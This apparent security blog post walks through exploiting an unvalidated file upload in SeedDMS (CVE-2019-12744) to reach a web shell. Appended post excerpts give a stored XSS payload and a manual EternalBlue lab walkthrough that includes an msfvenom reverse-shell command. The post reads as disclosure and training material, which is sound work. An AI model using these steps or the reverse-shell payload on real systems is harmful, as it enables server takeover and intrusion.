Skip to main content

Exploit for CVE-2019-12744 Remote Command Execution (RCE) through Unvalidated File Upload

As of late, I have discovered a genuine vulnerability RCE (Remote Command Execution) in one of the open-source software to be specific “SeedDMS”. Through this vulnerability, an attacker can upload a backdoor/web shell and execute commands on the server. 

Because of the security concerns and impediments, I wouldn't be uploading any snippets or screenshots here but would try to explain it as brief as could be expected under the circumstances. 

How about we get into the Exploit part as follows:
  1. Sign in to the application and inside any folder upload a PHP web shell file (there is no restriction or validation on the uploaded file).
  2. Presently in URL, you can observe a document id corresponding to the file uploaded (This ID is actually the folder name, I will jump on to this towards the end of the blog as to how I learned about the same) 
  3. Now go to the following URL "example.com/data/1048576/DOCUMENT_ID/1.php" 
That is it!!!... Right it might sound very straightforward and yes it is however the tricky part was to get to know the path of the file being uploaded and even the name of the uploaded file to execute the same. For that, I downloaded the SeedDMS open source bundle to understand the directory structure and observed the data folder and the 1048576 default folder. And lastly using some hit and trials was able to deduce that file name was getting renamed to "1" with extension left unchanged.

A lesson to Learn: 
  • Improve your observation skills to exploit these kinds of findings, try observing the patterns.
  • The "data" folder should be placed outside of web directory and access to it should be restricted.
P.S. I have already reached out to the vendor and their help was very quick. They have fixed it and issued an update for the same.
https://sourceforge.net/p/seeddms/code/ci/master/tree/CHANGELOG


Comments

Popular posts from this blog

Exploit for CVE-2019-12745 - Stored XSS (Cross-Site Scripting)

In a series of my findings in SeedDMS Software. A quick update, SeedDMS is a opensource software in which I have found Vulnerabilities like RCE and XSS . This article is focused on the XSS finding, I had found in the latest version of SeedDMS. Lets get into the Exploitation part to see how it can be reproduced. Login to the application and go to My account and edit user details. Change the name by adding <script>alert("name")</script> as shown in below image. Now browse to user management option in Admin-tools and click on choose user to execute the previously inserted javascript code. A key takeway from this finding is that while pentesting try injecting JS payloads very specific for example here I have used "name" rather than traditional "1" inside the alert box. Why? You might ask. Reason is simple you might not know when where sanitisation and validation is not in place, and your injected payload might get executed somewhe

Eternal Blue (MS17-010) - Manual Exploitation

Background: As a part of my preparation for OSCP, I came across a way to manually exploit eternal blue (without  metasploit). So compiling the same here so it could be useful to others too. For the purpose of demonstration I am using blue machine from Hack the Box (HTB). Exploit Use searchsploit to find the eternal blue exploit or you can even download it from exploitdb Now there are some modifications required and files required. We need to first make our backdoor exe to get a shell back. msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 -f exe > blue.exe Now we need to make few changes in the script from Exploitdb or searchsploit as follows: If we go through the script it will tell us we also need a smb file as a dependency for running this script. So you can download that file from here Now open a listener to get back a shell and run the script with the argument "netsvcs" Reference: https://github.com/worawit/MS17-010/blob/master/mysmb.py ht